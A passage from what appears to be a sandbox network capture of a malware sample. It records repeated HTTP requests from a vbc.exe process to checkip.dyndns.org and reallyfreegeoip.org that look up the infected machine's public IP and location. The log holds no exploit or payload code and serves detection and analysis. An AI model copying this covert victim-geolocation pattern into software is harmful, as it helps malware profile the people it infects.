                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49744 | 132.226.8.169 | 80 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:05:51.081343889 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
Jan 13, 2025 13:05:51.924890995 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:51 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49745 | 132.226.8.169 | 80 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:05:51.291662931 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
Jan 13, 2025 13:05:52.118431091 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:51 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49748 | 132.226.8.169 | 80 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:05:52.523053885 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
Jan 13, 2025 13:05:53.354266882 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:53 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49714 | 104.21.112.1 | 443 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:40 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:40 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:40 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084729
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V7weWkLJP06Bq4bzDHoP%2FmeUacz7j%2B9vp7Ocj%2BYw%2B5AKygK8ro1BqldixOpcGOO61ShUGMUSiTax3wKvEz9R1FTiyZvvIBTMS6rNSLJi2W7CE4hNDh5%2BkCfhGQeXSy8nGZ0grksL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9015417fde2f0f5b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1680&rtt_var=632&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1727810&cwnd=221&unsent_bytes=0&cid=32c350478485a687&ts=182&x=0"
2025-01-13 12:05:40 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49715 | 104.21.112.1 | 443 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:42 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
2025-01-13 12:05:42 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:42 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084731
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmsHv2Xxw8GcWbPWtsmBtKr1qNLjmTe6DIcJhEoX8ZZZD9Bd9MMrDDP%2FoCNgKd%2Fsz5sUEFtCZBwHppdqYsS5Rj5JY72rAkV%2F9YqntjHdJ9ziBSgWNsbiMNPQWCkKc1xV6HFzKSUf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9015418bf926424b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1565&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1833019&cwnd=249&unsent_bytes=0&cid=f191e69be295a61c&ts=154&x=0"
2025-01-13 12:05:42 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49716 | 104.21.112.1 | 443 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:42 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:42 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:42 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084731
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utYmhGTMU2pJEMFY4smKO0tALIEjKKyvTGM9UYuRFnFVqobJd%2BdLHqnxUrq5hDyysDnFIuQepIKcScAvm98562PD0eVdZL6jDEKyKxP4S6wa2pUigwb%2BqDlSDROcbgdJr%2F42wrYw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9015418da9d00f5b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1631&rtt_var=623&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1740166&cwnd=221&unsent_bytes=0&cid=8768af2c1bf7aadb&ts=168&x=0"
2025-01-13 12:05:42 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49718 | 104.21.112.1 | 443 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:43 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
2025-01-13 12:05:43 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:43 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084732
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R6bH%2BOSEr0w4Exi2F%2BZPwzI78RN5lD7q%2B4SVQp3S7gAEhgMwiaLqjPaD%2B5BJrfJB%2F1juaaLHhjNT108VCeCTtDbbvh5PQTNXVLPyrufPNRLVDeFyS6fWnhaiKiZMHJKqucOYHaqn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9015419358c043b3-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1573&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1826141&cwnd=203&unsent_bytes=0&cid=030903913a665b30&ts=152&x=0"
2025-01-13 12:05:43 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49719 | 104.21.112.1 | 443 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:43 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:43 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:43 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084732
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mhY6EQsPlGDSZvn47dprfpLnM5ZQnOpVZUT13ptxAEx6zlz%2FcIWNYUL%2FV%2Bz%2FWZ4d2sQfi%2FtCHaMrJoRNY5Inc0D4upjLuMnCh8RwRDevSulWeJ55EA0EXv6rsKewUquChmGbic8D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 90154194fc98727b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1912&rtt_var=730&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1485249&cwnd=234&unsent_bytes=0&cid=1f0233576fc542a0&ts=139&x=0"
2025-01-13 12:05:43 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49722 | 104.21.112.1 | 443 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:44 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
2025-01-13 12:05:45 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:45 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084734
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CNoJUCQF3KXDcMJE42Nue8faW%2FNYcBPJizyICJVafSKZUQybBdqWEZuTK5%2FS2A%2F%2F79b2vS3b35OXRC4Ehc6pmfY6Arefkn9RZK2AZFnXX9bTDZz7VJQmW6Vzn7Sm8mBSPu%2FzCdcD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9015419c3e06424b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1510&rtt_var=588&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1828428&cwnd=249&unsent_bytes=0&cid=ecbebaf24b581312&ts=130&x=0"
2025-01-13 12:05:45 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49723 | 104.21.112.1 | 443 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:45 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:45 UTC | 856 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:45 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084734
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LrUUb1xnSkyIXdcAfW0r6x1lqDtt1vdLoCttNR3zjEJH3VOsdzh3weFFQxz9qnVV%2B66%2BP%2B9qZwfXZAmTk5oabGr%2FK2Nk7hVidRISEsxI8upqrDJcS7F364S8ByUndKnv6W8e6niR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9015419e5acec34f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1462&min_rtt=1462&rtt_var=731&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4234&recv_bytes=699&delivery_rate=164999&cwnd=181&unsent_bytes=0&cid=242d49ee5ac9600a&ts=169&x=0"
2025-01-13 12:05:45 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49726 | 104.21.112.1 | 443 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:46 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:46 UTC | 854 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:46 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084735
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FsCis0Hp3JbQOFyO0NAzYXU96vXuZwWEFKvjpwOKxvlfsLFSKDtINzkkg9Uw61ApPJp8OvxwjDx0eWP808pkAWS2TDfe%2BaKbc5ho9fHmXlZln5DyXC7%2FD1nO22EZEsNPiE8oKxvQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541a65f7c0f5b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6537&min_rtt=1530&rtt_var=3692&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1908496&cwnd=221&unsent_bytes=0&cid=e88ec7ef5ac5bd5d&ts=139&x=0"
2025-01-13 12:05:46 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49727 | 104.21.112.1 | 443 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:46 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
2025-01-13 12:05:46 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:46 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084735
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fc5Y0pvjMk6SH6sz%2FvbctC3YC48IJ%2F%2Bg4sHpaBCUnYEr02eSd%2Fmgu%2BmNxhQNYKTs1z7mance4vughXKLQrXKfbnSekMlUvrzaclMiFAlMsowfsBzU45w2p9IeZ3uhUBmDD6YSUjC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541a788680f5b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1496&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1888745&cwnd=221&unsent_bytes=0&cid=1a5ed3950c078ad4&ts=137&x=0"
2025-01-13 12:05:46 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49730 | 104.21.112.1 | 443 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:47 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:48 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:48 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084737
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FzQqjDHek65oA4PDhOwIAP7HLTUV0jWLFvDpPWmlKFgZZCX61phXGEpPdxl8lfkOoEcnYkGW3j6yVuWCsVx1nWeMAU2Wsv2tVhx8f%2Bl5uSJcDOHt3RpeQHrGOH2qNNN%2F6E4Ushh"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541af5946727b-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=1996&rtt_var=758&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1462925&cwnd=234&unsent_bytes=0&cid=1e9feb92d273e357&ts=156&x=0"
2025-01-13 12:05:48 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.8 | 49731 | 104.21.112.1 | 443 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:48 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
2025-01-13 12:05:48 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:48 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084737
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WYedPSgbXWKW65h3RRZFDoAWxgpUNmOwKUChfovUpHYGLQm0YZQAzuFNQzagn4SvaDb%2BcXiNZoJDVPSXmfqRyllhHZa9atSAtb3Z%2FCALvqoPBwLzVhJYf2wZm2ZOimw%2FxBpKIe3l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541b08b8c729f-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2435&min_rtt=1989&rtt_var=1639&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=524991&cwnd=169&unsent_bytes=0&cid=c43c30d88af4255f&ts=146&x=0"
2025-01-13 12:05:48 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.8 | 49735 | 104.21.112.1 | 443 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:49 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
2025-01-13 12:05:49 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:49 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084738
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4cgF0hAPoMjip0WTXWk77NIIOdgPTPRx68XXbhPiQcUCyUWkgf%2BVga8IyxkaH5RWuNdg6SxJaBHcTBW%2BB37c8683nRtQHyQOwDOgZ010Wl4gNORIzOmaFMCBwyimZxIdh7tIQkmX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 901541b8a82643b3-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1570&rtt_var=590&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1851616&cwnd=203&unsent_bytes=0&cid=0a61ee19514d1782&ts=129&x=0"
2025-01-13 12:05:49 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49736 | 104.21.112.1 | 443 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-13 12:05:49 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
2025-01-13 12:05:49 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:49 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 2084738
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
